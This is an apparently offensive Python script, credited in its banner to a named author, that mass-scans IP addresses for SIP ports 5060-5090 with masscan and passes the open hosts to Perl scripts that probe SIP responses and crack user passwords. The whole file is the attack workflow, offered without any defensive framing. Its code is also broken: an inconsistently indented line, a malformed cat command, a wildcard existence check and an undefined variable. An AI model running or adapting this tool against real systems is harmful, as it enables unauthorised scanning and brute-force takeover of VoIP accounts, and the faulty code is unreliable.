#coding:utf-8
import os
import time


splash1 = """
    +----------------------------------+
    | Scan Sip port & SIP responses & Crack user pass             |
    +----------------------------------+
    | by Mohammad Elnwajha                       |
    +----------------------------------+
"""
print(splash1)



os.system('masscan -iL ip.txt -p5060-5090 -oL masscan.txt --rate=100000')
while True:
    if os.path.exists("masscan.txt"):
        break
    else:
        time.sleep(1)
if os.path.getsize("masscan.txt") == 0:
    splash3 = """
    +----------------------------------+
    | masscan !          |
    +----------------------------------+
    """
    print(splash3)
    exit()
else :
    splash4 = """
    +----------------------------------+
    | Masscan & SIP responses |
    +----------------------------------+
    """
    print(splash4)
    masscanfile = open("masscan.txt", "r")
    masscanfile.seek(0)
    for line in masscanfile:
        if line.startswith("#"):
            continue
        if line.startswith("open"):
            line = line.split(" ")
            with open("IPS", "a") as f:
                f.write(line[3]+"\n")
                f.close()
    masscanfile.close()
if os.path.exists("masscan.txt"):
    os.system('perl run IPS')
    os.system('cat 403.txt,404.txt >> ipSIP')
    os.remove("masscan.txt")
	os.remove("IPS")
    splash2 = """
    +----------------------------------+
    | SIP responses is done !                  |
    +----------------------------------+
    """
    print(splash2)
else:
    splash5 = """
    +----------------------------------+
    | Crack user & pass  |
    +----------------------------------+
    """
    print(splash5)
    exit()
if os.path.exists("ipSIP"):
    os.system('perl Crack 250 2 ipSIP')
else:
    print("Good Result")
    exit()
if os.path.exists("*"):
    splash6 = """
    +----------------------------------+
    | Good Result is done |
    +----------------------------------+
    """
    print(splash7)
    exit()

